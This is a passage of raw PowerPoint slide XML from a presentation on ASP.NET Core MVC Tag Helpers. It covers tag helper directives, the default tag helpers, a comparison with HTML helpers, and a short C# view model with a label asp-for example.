            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>makes them available in all the views</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>@removeTagHelper </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>removed a previously added Tag Helper</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>@tagHelperPrefix </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>specifies tag prefix to enable Tag helper support</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078596" y="4578937"/>
            <a:ext cx="7463146" cy="1805599"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1">
                <a:lumMod val="75000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295400" y="1905000"/>
            <a:ext cx="7667625" cy="1628775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27036298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Microsoft.AspNet.Mvc.TagHelpers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A0AE9EC9-F182-4A35-8041-CBBE9CFA6E78}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>62</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Default Tag Helpers in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Microsoft.AspNetCore.Mvc.TagHelpers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> package</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Anchor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cache</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Image</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Input </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Validation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Link</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Select</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Label</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Form – Automatically adds AntiForgery token</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Custom</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Source Code: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/aspnet/Mvc/tree/dev/src/Microsoft.AspNetCore.Mvc.TagHelpers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14571088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Helpers vs. HTML Helper</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A0AE9EC9-F182-4A35-8041-CBBE9CFA6E78}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>63</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Tag Helper</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>IntelliSense</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Distinct font and clean code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Assists in writing robust and maintainable code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>No need to learn C# syntax for UX designers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>HTML Helper</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Lack of full IntelliSense support</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Crowded code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Lack of maintainability, for example, image caching</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C# knowledge is required</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Screen Clipping"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4495801" y="4311607"/>
            <a:ext cx="6725480" cy="685493"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1">
                <a:lumMod val="75000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6181810" y="1273359"/>
            <a:ext cx="5039471" cy="2329938"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1">
                <a:lumMod val="75000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8653895" y="3621024"/>
            <a:ext cx="2567385" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Tag Helper</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8915401" y="4993297"/>
            <a:ext cx="2305880" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTML Helper</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13283176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View with HTML Helpers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A0AE9EC9-F182-4A35-8041-CBBE9CFA6E78}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>64</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2667000" y="1143000"/>
            <a:ext cx="6419850" cy="4956175"/>
          </a:xfrm>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1">
                <a:lumMod val="75000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6214785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View with Tag Helpers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A0AE9EC9-F182-4A35-8041-CBBE9CFA6E78}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>65</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3025775" y="1143000"/>
            <a:ext cx="5813425" cy="5010150"/>
          </a:xfrm>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1">
                <a:lumMod val="75000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35569702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 Tag Helper</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>public</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="2B91AF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SimpleViewModel</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2B91AF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Display</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"Email </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)]</a:t>
            </a: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string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> Email { </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>get</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set</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>; }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="cs-CZ" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800080"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>label</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="800080"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>asp-for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Email</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800080"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>label</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" dirty="0">
              <a:solidFill>
